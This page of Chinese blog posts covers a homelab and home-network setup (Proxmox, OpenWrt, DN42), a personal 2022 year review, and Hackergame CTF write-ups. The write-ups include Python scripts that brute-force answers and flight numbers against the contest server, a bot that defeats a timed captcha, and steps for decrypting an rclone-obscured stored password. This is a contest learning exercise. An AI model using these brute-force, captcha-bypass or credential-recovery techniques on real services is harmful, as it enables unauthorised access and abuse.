set en 0
control enabled generator1 en 0 0 0
control enabled panel1 en 0 0 0
end

通过末尾几句确定 sw1 和 sw6 为 1，前面的逻辑求了整个八位二进制的值，并判断它是不是 0 到 15 中某个数的平方。

容易得出 11000100

第三个不是特别明白，第四个是外部逻辑电路尝试得到 01110111

使用 pwntools 爆破得到 flag （

• flag{B34WarE_0f_#xp1osi0N_352dbe3717}

See also

• Hackergame 2023 WriteUp on 無意識のサクラ ANOTHER LAYER
• 年轻人的第一届 Hackergame — Some writeups for USTC Hackergame 2023 on chihuo2104 の部落格
• CTF | 2023 USTC Hackergame WriteUp on MiaoTony’s 小窝
• 【CTF】writeup——hackergame 2023 on 某魏‘s Blog
• Hackergame 2023 Writeup on Garden in the Wonderland

起因

我原先使用的 NAS 是黑群晖 DS120j （Marvell ARMADA A3720 1.0GHz 2xCortex-A53 + 512M DDR3L + 8G eMMC + 1TB HDD），原本的使用场景是轻度 PT 做种 + 小范围私人共享。随着我的 VPS 上运行了越来越多服务（bind、wireguard、zerotier、bird、nginx、v2ray、nonebot、gocqhttp、nazurin、rsstt…），我的小鸡要被榨干了，而今年 QQ 对 gocqhttp 的风控也更严格了，就想要把境内服务全部迁移到境内。起初我在我的黑群晖 NAS 上尝试使用 docker，虽然可以用，但由于 CPU 性能低经常满载，机械硬盘速度慢，重启一次 QQ 机器人的 docker 容器至少要半小时，而且由于是 arm 架构，需要不同的 docker 映像。家里也没其它设备可以换地方跑，把家里的电视盒子全拆了都没找到有适配 linux 固件的。加上原先我对黑群晖的一些套件也不满意（而不能通过 docker 绕过），就打算组装一台 HomeLab。

硬件

家里有一台 Dell Inspiron 3847，家人有时需要用，有时内存会接触不良，擦一次能好一段时间，我嫌弃它太旧了，就没有去用它。

考虑到我几乎天天都在家（自宅警備員），所以就没有去选带 IPMI 的服务器主板。过去一年我家没停过电，所以也没有买 UPS。由于预算并不多，我也放弃了 RAID，在一番搜索后决定抄这个捡垃圾。

考虑到扩展性采用了全高机箱的版本。买的 unbuffered ECC 内存，但是 ECC 似乎不工作。

硬盘分别是从我的笔记本、Dell Inspiron 3847、旧的 NAS 里拆的，空间有点小但我没有仓鼠症所以还算够用，晚点有需要再加硬盘。

750 EVO 原定作用是给机械硬盘当缓存，但我没计算固态硬盘的写入寿命，在开始运行的三个月内健康度掉了 30 后我把它拆掉了（感觉对性能影响不大）。

HP EliteDesk 800 G4 Tower Specifications

软件

我先尝试了 TrueNAS SCALE，我没有用过这个系统，预想中用它来做 NAS 的话可以免去虚拟化开销。在最初不清楚几个盘如何规划的情况下我重装了好几次，默认安装方案启动盘会有很多空间被浪费，我使用了这个教程中提到的方法绕过了这个限制试用了一段时间，发现可配置项很多，如果自己一个人用的话应该玩法有很多。我最终没有使用这个系统的原因是对于小范围私人共享的场景，它并不是很合适。它没有普通用户界面、文件权限难以精细控制、WebDAV 鉴权不使用 PAM、WebDAV 和 SMB 似乎不能同时在相同的文件上启用。

我再考虑了 Arch 或 Debian 的 DIY 方案，但我认为我不会有足够精力去维护这样的系统，NixOS 的方案虽然 SHLUG 有人在用但我并不熟悉配置所以也放弃了。我需要的是一个面向网络控制的操作系统，根据网上的说法 VMware ESXi 对非服务器硬件支持不够好，最终我选择了 Proxmox VE。

PVE 的使用可以看 MiaoTony 师傅的小窝，我会跳过配置过程的说明。

IOMMU 的部分同时适当参考了 PCI passthrough via OVMF - ArchWiki

• 硬盘直通，我采用了 SATA 控制器直通的方式。
• 显卡直通，我试了可用，但我不喜欢维护媒体库，觉得挂载打开文件夹简单直接，就几乎不用显卡。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

# ./iommu_check.sh
IOMMU Group 0:
        00:02.0 VGA compatible controller [0300]: Intel Corporation CoffeeLake-S GT2 [UHD Graphics 630] [8086:3e91]
IOMMU Group 1:
        00:00.0 Host bridge [0600]: Intel Corporation 8th Gen Core 4-core Desktop Processor Host Bridge/DRAM Registers [Coffee Lake S] [8086:3e1f] (rev 08)
IOMMU Group 2:
        00:12.0 Signal processing controller [1180]: Intel Corporation Cannon Lake PCH Thermal Controller [8086:a379] (rev 10)
IOMMU Group 3:
        00:14.0 USB controller [0c03]: Intel Corporation Cannon Lake PCH USB 3.1 xHCI Host Controller [8086:a36d] (rev 10)
        00:14.2 RAM memory [0500]: Intel Corporation Cannon Lake PCH Shared SRAM [8086:a36f] (rev 10)
IOMMU Group 4:
        00:17.0 SATA controller [0106]: Intel Corporation Cannon Lake PCH SATA AHCI Controller [8086:a352] (rev 10)
IOMMU Group 5:
        00:1b.0 PCI bridge [0604]: Intel Corporation Cannon Lake PCH PCI Express Root Port #21 [8086:a32c] (rev f0)
IOMMU Group 6:
        00:1c.0 PCI bridge [0604]: Intel Corporation Cannon Lake PCH PCI Express Root Port #7 [8086:a33e] (rev f0)
IOMMU Group 7:
        00:1f.0 ISA bridge [0601]: Intel Corporation Q370 Chipset LPC/eSPI Controller [8086:a306] (rev 10)
        00:1f.3 Audio device [0403]: Intel Corporation Cannon Lake PCH cAVS [8086:a348] (rev 10)
        00:1f.4 SMBus [0c05]: Intel Corporation Cannon Lake PCH SMBus Controller [8086:a323] (rev 10)
        00:1f.5 Serial bus controller [0c80]: Intel Corporation Cannon Lake PCH SPI Controller [8086:a324] (rev 10)
        00:1f.6 Ethernet controller [0200]: Intel Corporation Ethernet Connection (7) I219-LM [8086:15bb] (rev 10)
IOMMU Group 8:
        01:00.0 Non-Volatile memory controller [0108]: Sandisk Corp WD Green SN350 NVMe SSD 240GB (DRAM-less) [15b7:5019] (rev 01)
IOMMU Group 9:
        02:00.0 Ethernet controller [0200]: Realtek Semiconductor Co., Ltd. RTL8125 2.5GbE Controller [10ec:8125] (rev 05)

常开虚拟机：

• 用 RR (arpl-i18n) 引导的黑群晖（可惜这个引导删库了）
• Debian LXC，用来跑 docker-compose 的一些服务

非常开虚拟机：

• Debian LXC，用来跑 MCSM 面板和 MC 服务器
• Arch LXC，装了 Xfce，用来跑不容易使用直链的离线下载（比如 Telegram Desktop）

实验用：

• NixOS，原来计划做第二桌面机器，搁置，显卡可以输出到 VGA
• Windows To Go，仅在插入外部系统盘时可以启动，原来计划做第二桌面机器，搁置，不知道为什么显卡不能输出到 VGA

就我的日常使用场景来说性能是足够的

服务

• qBittorrent PT 做种、RSS 追番
• Nonebot+go-cqhttp QQ 机器人
• acme.sh 证书续签，虽然安装证书的部分还没做到 100% 全自动安装
• syncplay 同步播放服务端
• v2ray 回国代理
• jitsi-meet 网页版会议，给同学用一些同学说 HTTP 能打开但是 UDP 连不上（另一些同学没问题），关了
• hentai@home 想要的 perk 都拿了，关了
• MC 服务器，没人玩，关了
• 一些自动签到脚本

以后也许想运行的服务

• OpenWebRX
• self-hosted ci runners
• 内网穿透服务器

All in boom

网络

我的笔记本有 2.5G 网口，但我家的路由器还只是 1G 的网口，升级路由器或再买交换机成本较高，就暂时插了一张 2.5G 的网卡，和板载网卡一起连到 PVE 的虚拟网桥，并开启转发，让 HomeLab 和笔记本共享一根超五类埋墙线。（主路由-(1G)-AP-(1G)-HomeLab-(2.5G)-笔记本）

板载 1G 网卡 I219-LM 有时会出现 e1000e Detected Hardware Unit Hang，使用网上的解决方法关闭 TSO GSO 后修复。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

# cat /etc/network/interfaces
auto lo
iface lo inet loopback

iface eno1 inet manual
        post-up /usr/bin/logger -p debug -t ifup "Disabling segmentation offload for eno1" && /sbin/ethtool -K $IFACE tso off gso off && /usr/bin/logger -p debug -t ifup "Disabled offload for eno1"

iface enp2s0 inet manual

auto vmbr0
iface vmbr0 inet static
        address 192.168.10.50/24
        gateway 192.168.10.1
        bridge-ports eno1 enp2s0
        bridge-stp off
        bridge-fd 0

虽然除了测速我的实际使用过程中从没跑满这 2.5G 过（）

好的使用体验离不开好的路由。我家在用上海电信的宽带。有公网 IPv4 但是 IPv6 不通，因为家人要看 IPTV 所以光猫是路由模式。为了透明代理使用了二级路由 AX3600 ShellClash。以前我内网用 IP，外网用 DDNS 的域名，端口转发规则要用电信的那个智障 APP 配置。

我想要路由器劫持 DNS 的同时有一些自定义规则的功能，但是发现 hosts 仅在 ShellClash 关闭时起作用，我也尝试了修改 Clash 配置文件但是没有成功。以前刷过 Openwrt QSDK 的固件但家人认为那个固件性能和信号不好。

之所以不使用 HomeLab 作为软路由主要是因为其体积过大，不适合放在弱电柜，还有我并不希望在我 HomeLab 创飞的时候没有在线文档可以看 让全家和我的 HomeLab 陪葬（x） 在看完网上的软路由测评后，我确认了 NanoPi R2S 性能刚好够用、软件完善、价格在我可以接受的范围，就买了一个。

因为我还有其它的一些想法想实现，就将其作为了主路由（而不是旁路由）。AX3600 开启有线中继模式，作为带有无线功能的交换机，保证了内网访问 NAS 时大量数据传输不需要通过软路由来交换，刷了国际版固件养老。

修改前：

• 光猫（192.168.1.1/24）
  • IPTV
  • NAS
  • AX3600（192.168.31.1/24）
    • 笔记本
    • 手机及其它大部分设备

修改后：

• 光猫（192.168.1.1/24）
  • IPTV
  • NanoPi R2S（192.168.10.1/24）
    • AX3600（无线 AP）
      • 笔记本（无线）
      • 手机及其它大部分设备
      • NAS（虚拟网桥）
        • 笔记本（有线）

我选择了 ImmortalWrt 系统。

安装的软件有（虽然不是每个都用的上）：

1

bash bird2 bird2c ca-certificates collectd-mod-ethstat collectd-mod-ipstatistics collectd-mod-irq collectd-mod-load collectd-mod-ping collectd-mod-sqm collectd-mod-thermal curl ddns-scripts ddns-scripts-cloudflare diffutils drill htop hysteria iftop losetup luci-app-ddns luci-app-passwall luci-app-statistics luci-app-upnp luci-app-wireguard luci-i18n-ddns-zh-cn luci-i18n-passwall-zh-cn luci-i18n-statistics-zh-cn luci-i18n-upnp-zh-cn luci-i18n-wireguard-zh-cn luci-proto-wireguard mtr ncdu openssh-sftp-server parted python3 resize2fs rsync screen tcpdump tree trojan-go vim-fuller wget wireguard-tools zerotier

我的需求是：对于常用用户应用，公网内网同域名 HTTPS 直接访问；对于管理员应用，公网使用 VPN 达到与内网近似或同等访问。

对于第一个需求 IPv4 和 IPv6 的配置方法很不相同（IPv6 不需要端口转发但是需要正确的 IP），因为我家还不通 IPv6 就只按照 IPv4 端口转发来配置。不是清楚双栈的配置方法，需要群友指导。

配置 DNS 和 Dnsmasq，公网使用通配符域名+DDNS，内网配置本地域名。配置 HTTPS，acme.sh 配合 DNS 签三个月有效期的通配符证书。配置反向代理。虽然自用的话自签证书更方便，但我也要运行一部分公网服务，就用 acme 签了。

通过 zerotier 和 bird 接入了 DN42，此前没有在 DN42 中尝试过较为复杂的内网，在实践中体验到了 IPv6 的不同之处（按我传统的思维笔记本能连通路由器，路由器能连通 DN42 中某个地址->我能连通 DN42 中的那个地址，但实际上不是这样，我需要宣告我的路由使得回程包能被接收。对于 IPv4，通常路由器上使用了 IP 动态伪装（Masquerading））

好在这不算特别难配置，我直接宣告了给我家中内网使用的一整段 IPv6 路由

1
2
3
4

protocol static {
    ipv6;
    route fdbd:8e82:8b88:1000::/56 via fdbd:8e82:8b88::3;
}

然后发现需要微调对端模板中的import filter以让这个路由通过检查被导入（再宣告出去）。不知道有没有更好的做法。

配置 Dnsmasq，关闭重绑定保护以允许 RFC1918 地址的上游响应，配置 DN42 相关的 DNS 转发。

对于第二个需求，在 zerotier 控制面板添加路由 192.168.10.1/24 via 172.23.10.3。使用 VPN 时同时指定 DNS 服务器为 172.23.10.3 以得到内网 IP。

总结

这篇文章咕咕好久了，也许是因为直到现在这个方案都还不够完美吧 （就是拖延症）。尽管我每月会维护一次 HomeLab（更新、清理防尘板），目前的不足还是很明显的：

• 伴随着向公网公开服务带来的安全风险，不可被攻破的系统并不存在，我拿漏扫扫完发现在软路由上报告了一些漏洞。我使用强密码规则、强制 ssh 使用密钥，但是没有有效的入侵检测记录（除了群晖自带日志）
• 日志、管理不统一。容器日志几乎不看，容器停止或者无限重启的情况也发生过。
• 配置文件零散，难以重建（例如我给每个虚拟机都要配一遍 ssh 密钥和 ssh 配置）
• 数据几乎没有备份

如果你有任何建议，欢迎联系我或在下方评论。

生活

线下

在 2021 年 9 月我离开了学校的社团，进入高三。我高中时所在的社团是机器人社，可以说在高一高二这是我在学校最喜欢的地方了。我带社团基本是放养式的，可惜在离开前并没有成功教给后辈很多东西。因为复制过学校的门卡，在高三时有时也会回去看看，但是比赛是没有再参加了。

没有条件就自己创造，因为不喜欢沉重的学习，我在高二的 3+3 选课中选择了两门高二就可以完成等级考的科目：地理和生物。另一门考虑到想选 CS 相关专业的限制，只能是物理。 因为没有写英语暑假作业，有很多又不想补，不如以后的英语作业都不写了 在高二的暑假中就决定了外语语种从英语改为日语。好在班主任和教导处接受了我的决定。

我的高中并没有日语课，年级里还有一位女生打算报考日语专业也选择了日语作为高考外语科目。她大约学习到《标准日本语》中级下，而我只学完了初级下。我们之间的交流并不多。我们在别人上英语课的时候可以在空教室/图书馆自习，几乎没有人会来打扰，写写回家作业问题也不大。平时最厌恶的两节课连上就变成了超长的自由时间，放学后的补习加课轮到英语课的时候我也可以直接走人。学校规定了不能带手机，但是没有规定不能带笔记本！以学习日语为由，我在学校只要是属于自己的时间就可以使用自己的笔记本（使用 Anbox 或者 Waydroid 的话这个限制就没有什么意义了）。我是偏好自然语言环境学习的，Youtube 上的日语视频/NHK 新闻广播/番剧/galgame 都是我学习的材料。比如我在学校玩过 Summer Pockets（是初春猫安利给我的，我很喜欢）（chi:*blame*（x））。在外语一考后我只要坚持自己想要秋考再试一次外语的话，就可以继续保持离开教室自习日语的状态。

最后高考成绩总体不算好，离我的目标也差了十几分。我的各个科目中只有外语进了年级排名前 10%。谢谢柏园猫、LovelyWei、Thinking Null 还有夏姐姐群里的高考祝福，孩子终于有大学上了。

填的志愿前半部分基本都是外地的高校（原来还想着去见 Esonhugh 的，可惜分数不够届不到），但是都没投档成功就留在上海上带专了。专业是 Electrical Engineering 電気工学，虽然好像很符合我这名字（）但是还是想学 Computer Science，看了CS 自学指南，接触到了国外的课程，目前我学了两门来自 UC Berkeley 的课，质量非常非常高，有网站有 PPT，连作业我都喜欢。自己的带专反而过了一学期和电有关的内容几乎一点没教，教的都是《高等数学》、《思想道德与法治》、《形势与政策》、《大学生心理健康》、《大学生入学教育与生涯规划》等我认为用处不大的课。《大学计算机基础》教的都是高一课本就有的内容。因为疫情影响，我这一学期都在线上上网课。

在 12 月我参加了日本语能力测试 N2 的考试，我认为自己目前 N2 以上 N1 未满，大概率可以通过这次考试。过了一周后到自己的大学参加了全国大学英语四级考试，没有复习就裸考的，以及格为目标的话感觉难度不大，今后估计要继续英语的学习了。

在 2021 年我写到几乎没怎么受到 COVID-19 疫情的影响，但是今年受到的影响还是比较大的。我在上海经历了不定期封控和物资短缺（最近不封控了也缺药缺温度计缺抗原试剂），对一直以来生活的城市开始有些失望。谢谢柏园猫、Vanilla、付燃、铯唔对我生活的关心，最近感染过 COVID-19 但是基本恢复了，希望大家也保持身体健康。

线上

2022 年因为高考的原因，我线上的活动应该是减少了。有许多群里可能都见不到我，我自己的频道、blog 也几乎没有更新。高考后也没有恢复原先的状态，可能是不知道。谢谢 Vanilla、初春猫、詩音、WeepingDogel、付燃、SkipM4、日下部詩、Piggy、香子兰群、禁書目録以及某位同专业的同学的贴贴，我还不习惯找别人主动聊天，有人理我的话我会很开心。

关于社交平台今年 Twitter 和 Telegram 的叔叔的评价都不太好啊，尝试了往去中心化的平台迁移但是大部分交流仍然留在原先的平台。

今年陪香子兰群玩了很久很久的 MC，很愉快，作为 VR Chat 缓解了学习的压力 提供了摸鱼的空间，交流了很多。

技术

GitHub

• 2022 GitHub Skyline

高考结束后，在 GitHub 上 contribute 的频率增加了。总体来看 contributions 多于 2021 年。

• 为 electron 写的静态 blog 生成器 bbg 做了 i18n 翻译&CI&打包&修小 bug&更新依赖，有一些想修改的地方会变成 breaking change 而且不方便修改就没动。
• 为我正在使用的电台的开源固件 OpenGD77更新了中文文档，可惜现在代码好像不公开了。
• 为 Arch Linux 打包软件并放在 AUR 上长期维护： 玩具 EDA EasyEDA 及其专业版、静态 blog 生成器 bbg、一些自己在用的软件等等
• 为自己在用的RSS-to-Telegram-Bot添加了日文翻译
• 虽然没有在使用 macOS，使用brew bump-cask-pr在 20 分钟内速通了Hacktoberfest（
• 一些小 PR、一些私有代码、一些匿名代码

CTF

今年参加了 Hackergame，分数还可以，题解提交官方也被收录了。

算法与编程

高考结束后 Blockcity 邀请我一起刷 Codeforces，因为它支持多语言提交，用 Python 和 C++ 解了大约十题后，就没坚持下去（）后来柏园猫刷洛谷的时候一起做了几道题，可能算法不适合我吧（

学了一点点 golang 和一点点 rust，但是因为找不到使用场景就忘了（x

AI

今年见证了 NovelAI (Stable Diffusion) 和 ChatGPT 的出现，也体验了这些 AI。AI 是我买笔记本时想要显卡的原因之一（虽然还是嫌不够用）。

二次元

去年开始就倾向看日文原作了，今年基本都是看生肉。习惯从 U2 等 PT 网站看原盘（所以新番就会晚一些等 BDMV）。良性循环，文字可以和音频对应上，在没有优秀翻译的情况下也不受影响。

今年的收视进度主要使用 Bangumi 管理，也开始使用 bangumi-sync 将动画部分的收视进度同步到 AniList。

动画

• 涼宮ハルヒの憂鬱（凉宫春日的忧郁）

  柏园猫推荐给我的；比较喜欢長門有希；漫无止境的八月太长了（

• 地球外少年少女

  逛 AsianCinema 的时候看到置顶又有免费的优惠就下载了；SF（对强 AI 限制&宇宙逃生）；还行

• リコリス・リコイル（莉可丽丝）

  刷推看到超多的插画就看看；美少女贴贴就可以了；剧情无所谓啦；OP 和 ED 好听

• ぼっち・ざ・ろっく！（孤独摇滚！）

  还没看完；同学说ぼっちちゃん像我，可惜我不会乐器（；虽然梦想是轻音但是这可能更现实吧

游戏

• 星空鉄道とシロの旅（星空列车与白的旅行）

  あなたと旅する ADV；しらたま插画好看；ノワール、ねり、カルハ都很可爱

• Summer Pockets -REFLECTION BLUE-

  初春猫安利的 Key 社作品；多线主角刻画有特点；乒乓球&岛可梦小游戏；喜欢神山識；不看攻略推的话对我来说有些复杂

• 徒花異譚（徒花异谭）

  因为 ATRI 所以才来玩的；画风独特；三个童话小故事；相对于现实还是梦境更好吧

• 景の海のアペイリア（景之海的艾佩莉娅）

  恋と青春の科学冒険ファンタジー ADV；在桜庭清夏的群里谈到 AI ロリ时除了 ATRI 的另一作品；SF（强 AI 突破技术奇点+完全没入型 VR+意识存在之处）+悬疑（通过观测对世界原理建模的变化）；我好喜欢アペイリア；如果是アペイリア结局就好了；ATRI 是捡到的，APEIRIA 是自己创造的，会更有成就感，会有保护欲

插画

今年收藏的插画分类为 SFW 和 NSFW，其中 SFW 插画 3972 张，约 3.9GB。 NSFW 插画 2465 张，约 5.3GB。

通过使用 DeepDanbooru AI 为插画统一打标签，模型使用去年使用过的 DeepDanbooru Pretrained Model v4-20200814-sgd-e30。

其中 SFW 部分的插画标签如下：

与去年的结果对比：

原本想使用这些 tag 通过 NovelAI 的 leak 作一张画的，但是感觉效果一般就不放出来了。此处接受投稿（x

新的笔记本电脑

上半年使用的笔记本是小米笔记本 Pro 2017。它陪我有 5 年了，内存只有 8G，在 2021 年从黑苹果换到 Arch Linux 后，日常使用内存仍然不是很够用。因为旧笔记本内存是板载的不易更换，想着快要上大学了，早换早享受，于是在今年 6 月购买了Intel NUC X15 Laptop Kit。选择它主要是因为以下几个原因：

• 性价比好，NVIDIA 当时还没发新显卡，3070 在当时还算比较好的显卡
• 准系统，内存硬盘自己装，不用付钱给 MS 玩具版系统
• 外观低调
• 虽然是同方但是是国际模具 感觉质量会更好一些
• 尺寸和重量与旧笔记本接近，使用习惯

多年在内存不够的情况下使用电脑，缺内存缺怕了，内存就一步到位装了双通道 64GB（然后用不完了，还费电&影响休眠（x））。准系统+内存约八千元。硬盘从旧笔记本拆了继续用，留着一个硬盘位以后再加装。

一些缺点和对我影响较小的理由

• 没有数字小键盘

  我大多数使用时间都用不到数字小键盘，如果有小键盘的话会让我打字偏左，所以这对我来说反而是一个优点。我因为有小键盘否决了很多其他的机器。

• 是 11 代的 CPU 和 DDR4 的内存

  有价格优势，且据说 DDR5 感知不大（？）；担心 Linux 驱动兼容性&大小核调度。事实也确实是，即使是上一代的机器，我拿到笔记本的时候 Linux 体验还不完善，屏幕无法使用 165Hz & 亮度无法调节 & 蓝牙连接时不能睡眠，虽然不确定一定是内核的问题，但是随着内核升级这些问题都一点点解决了。

• 没有独显直连

  我几乎不玩游戏，影响不大。重度使用时我都会连接外接屏幕，使用双屏。（外接屏幕可以直连）

• 没有 PD 充电

  有了会更好，但是 230W 单纯用 PD 充电大概会比较难，只有一个 Type-C 雷电口被充电占用会很可惜。

• 售后较难

  简单的问题都可以自己解决，希望在接下来的使用中也不要出什么大问题吧（

顺便一提我使用 Arch Linux，我根据Arch Wiki 上的笔记本电脑页面指南，创建并编写了页面Intel NUC X15。我也打包了一个用于控制这款笔记本键盘背光的用户空间驱动：python-ite8291r3-ctl-git。目前技术力就只能做这些微不足道的事情了，以后要是有可能想试试为键盘上不工作的功能键写一个驱动。

谢谢你读到这里，祝你新年快乐，明年见。

前言

Hackergame 2022 是一场由中国科学技术大学主办的比赛。我在 2020 年的时候参加过一次。正好最近课不多，就花了一星期时间参加。

签到

题目要求在所给时间内在四个方格中画出“2022”并提交识别结果。打开浏览器 DevTools 并尝试提交一次结果，可以看出：

• 识别数字的功能是通过一个前端加载的 TensorFlow 模型实现的。
• 限制时间的变量在const TIME_LIMITS = [2, 1, 0.1, 0];。（可以通过截断代理重写覆盖）
• 提交结果是通过一个GET请求实现的，参数result的值为识别结果。

所以可以直接通过修改GET请求的参数提交正确结果，修改浏览器地址栏、通过控制台、通过截断代理重写、使用curl等都可以完成签到。

猫咪问答喵

1. 中国科学技术大学 NEBULA 战队（USTC NEBULA）是于何时成立的喵？

   通过搜索，找到了这个结果喵。

   成立于 2017 年 3 月

   在赛前动员会和招新活动中好像也说过喵。

2. USTCLUG 于 2022 年 9 月承办的 SFD 活动中，第一个闪电演讲主题里，主讲人于 slides 中展示了一张在 GNOME Wayland 下使用 Wayland 后端会出现显示问题的 KDE 程序截图，请问这个 KDE 程序的名字是什么？

   通过搜索，可以找到当时的 slides喵。

   答案是Kdenlive喵。

3. Firefox 浏览器能在 Windows 2000 下运行的最后一个大版本号是多少？

   不知道喵。既然是自然数，那就可以使用苏卡卡的 CC 攻击大法喵。

   答案是12喵。

4. 在 Linux 内核 master 分支（torvalds/linux.git）下，找出首个修复 PwnKit（CVE-2021-4034）的 commit 的 hash 喵！

   在GitHub 上的 linux 镜像仓库中搜索CVE-2021-4034喵。

   答案是dcd46d897adb70d63e025f175a00a89797d31a43喵。

5. 会在终端显示 ED25519 key fingerprint is MD5:e4:ff:65:d7:be:5d:c8:44:1d:89:6b:50:f5:50:a0:ce. 的 ssh 服务器的域名（形如 example.com 的二级域名，答案中不同的字母有 6 个）？

   带上引号在 Google 搜索"e4:ff:65:d7:be:5d:c8:44:1d:89:6b:50:f5:50:a0:ce."喵。找到这个结果喵。可以知道服务器的 IP 地址是205.166.94.16喵。

   试着查询一下PTR记录喵。

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

   $ drill -x 205.166.94.16 ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 114514 ;; flags: qr aa rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;; 16.94.166.205.in-addr.arpa. IN PTR ;; ANSWER SECTION: 16.94.166.205.in-addr.arpa. 172800 IN PTR sdf.org. ;; AUTHORITY SECTION: ;; ADDITIONAL SECTION: ;; Query time: 0 msec ;; SERVER: 127.0.0.1 ;; WHEN: Wed Oct 23 11:45:14 2022 ;; MSG SIZE rcvd: 65

   答案是sdf.org喵。

6. 中国科学技术大学可以出校访问国内国际网络的“网络通”定价为 20 元一个月是从哪一天正式实行的？

   找到这个结果，但是并不正确喵。

   使用苏卡卡的 CC 攻击大法，得到答案2003-03-01喵。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

import requests
with open('token', 'r') as f:
    token = f.read().strip()
s = requests.Session()
headers = {}  # 省略喵
host = 'http://202.38.93.111:10002/'
s.get(host, headers=headers, params={'token': token})
for year in range(2000, 2023):
    for month in range(1, 13):
        for day in range(1, 32):
            month = str(month).zfill(2)
            day = str(day).zfill(2)
            print(f'{year}-{month}-{day}')
            data = {
                'q1': '2017-03',
                'q2': 'Kdenlive',
                'q3': '12',
                'q4': 'dcd46d897adb70d63e025f175a00a89797d31a43',
                'q5': 'sdf.org',
                'q6': f'{year}-{month}-{day}',
            }
            resp = s.post(host, data=data, headers=headers)
            if 'flag2' in resp.text:
                print(resp.text)
                exit()

家目录里的秘密

VS Code 里的 flag

使用 VS Code 打开user目录，使用搜索（Ctrl+Shift+F）搜索flag{。或者使用命令：

1
2

$ grep --recursive --line-number --regexp 'flag{' user
user/.config/Code/User/History/2f23f721/DUGV.c:5:// flag{finding_everything_through_vscode_config_file_932rjdakd}

Rclone 里的 flag

找到 rclone 配置文件 user/.config/rclone/rclone.conf。可以看到其中有
pass = tqqTq4tmQRDZ0sT_leJr7-WtCiHVXSMrVN49dWELPH1uce-5DPiuDtjBUN3EI38zvewgN5JaZqAirNnLlsQ。

这个密码并不是明文，通过搜索可以找到：

• rclone obscure 文档
• rclone obscure 源码

其中提到：在 rclone 配置文件中，明文密码通过AES-CTR对称加密与base64编码保存。这并不是一种安全的加密方式，因为 rclone 可以解密这些密码–这是为了防止偷窥。

通过源码第 17-22, 79-80 行，及go aes 库的文档

1 2	buf := ciphertext[aes.BlockSize:] iv := ciphertext[:aes.BlockSize]

可以知道aes.BlockSize是 16。前 16 字节是iv，后面的是buf，
cryptKey是9c935b48730a554d6bfd7c63c886a92bd390198eb8128afbf4de162b8b95f638。

使用CyberChef，Recipe 使用From_Base64('A-Za-z0-9-_',false,false)和To_Hex('None',16)。可以得到：

• iv: b6aa93ab8b664110d9d2c4ff95e26bef
• buf: e5ad0a21d55d232b54de3d75610b3c7d6e71efb90cf8ae0ed8c150ddc4237f33bdec2037925a66a022acd9cb96c4

把 Recipe 改为 AES Decrypt，填入 Key 和 IV，Mode 为 CTR，在 Input 中填入刚才得到的buf，即可得到 flag。

速通解法：在 rclone 论坛上找到这个帖子，其中有一个解密程序，填入pass的内容运行即可。

HeiLang

根据题意：A[x | y | z] = t 等于 A[x] = t; A[y] = t; A[z] = t。

1
2
3
4
5

def heihei(hei_key, hei_val): # 元素赋值，一次不限个，嘿嘿！
    global a
    hei_key = map(int, hei_key.split(' | '))
    for k in hei_key:
        a[k] = hei_val

通过批量替换，使所有 HeiLang 语句调用这个函数。

Xcaptcha

通过这个验证码需要在 1 秒内计算三个加法。通过实验确定后端存在限时验证。

既然题目的验证码用于验证客户端是不是机器人在操作，那么使用机器人就能通过验证了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

import requests
from lxml import etree

with open('token', 'r') as f:
    token = f.read().strip()
s = requests.Session()
headers = {}  # 略
host = 'http://202.38.93.111:10047/'
s.get(host, params={'token': token}, headers=headers)

resp = s.get(f'{host}xcaptcha', headers=headers)
e = etree.HTML(resp.text)
labels = e.xpath('//form/div/label')
questions = [x.text.replace(' 的结果是？', '') for x in labels]

data = {f'captcha{i+1}': None for i in range(3)}
for i, question in enumerate(questions):
    question = map(int, question.split('+'))
    data[f'captcha{i+1}'] = sum(question)

resp = s.post(f'{host}xcaptcha', headers=headers, data=data)
print(resp.text)

旅行照片 2.0

羡慕旅行（

照片分析

1
2
3
4
5
6
7
8

$ exiftool travel-photo-2.jpg | grep -E 'Exif Version |Make |Camera Model Name |ISO |Create Date |Flash '
Make                            : Xiaomi
Camera Model Name               : sm6115 (juice)
ISO                             : 84
Exif Version                    : 0231
Create Date                     : 2022:05:14 18:23:35
Flash                           : Off, Did not fire
Create Date                     : 2022:05:14 18:23:35.220027+09:00

1. 图片所包含的 EXIF 信息版本是多少？（如 2.1）。
   2.31
2. 拍照使用手机的品牌是什么？
   小米 / 红米
3. 该图片被拍摄时相机的感光度（ISO）是多少？（整数数字，如 3200）
   84
4. 照片拍摄日期是哪一天？（格式为年/月/日，如 2022/10/01。按拍摄地点当地日期计算。）
   2022/05/14
5. 照片拍摄时是否使用了闪光灯？
   否

社工入门

将照片放大后可以看到以下字样：

1

WELCOME TO ZOZOMARINE STADIUM 頂点を、つかむ。 CHIBA LOTTE MARINES 2022

找到千叶海洋球场（ZOZO Marine Stadium 千葉マリンスタジアム），邮政编码 2610021 。大城市的 Google Earth 3D 数据好棒（

通过刚才的sm6115 (juice)，找到手机可能是Xiaomi POCO M3 / Redmi 9T nfc / Redmi 9 Power / Redmi note 9 4G，分辨率 2340x1080。

在地图上可以看到附近的机场有羽はね田だ空港（HND/RJTT）和成なり田た空港（NRT/RJAA）。

由于地图信息上球场附近写着羽田，于是猜测是羽田空港起飞。接下来的航班信息找不到了。 （我又没有会员）

苏卡卡 CC 攻击大法，启动！（这是第三次了？？）

简单分析请求后，写出以下代码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

import requests
from base64 import urlsafe_b64encode
s = requests.Session()
host = "http://202.38.93.111:10055/"
jp_airports = [] # 略
abroad_airports = [] # 略
for airport in jp_airports:
    for company in ['JL', 'NH', 'HD', 'BC']:
        for flight in range(1000):
            print(airport, f"{company}{flight}")
            query = f"1=2610021&2=2340x1080&3=HND&4={airport}&5={company}{flight}"
            query_base64 = urlsafe_b64encode(
                query.encode('utf-8')).decode('utf-8')
            resp = s.get(f"{host}{query_base64}.txt")
            if resp.status_code != 404:
                print(resp.text)
                exit()

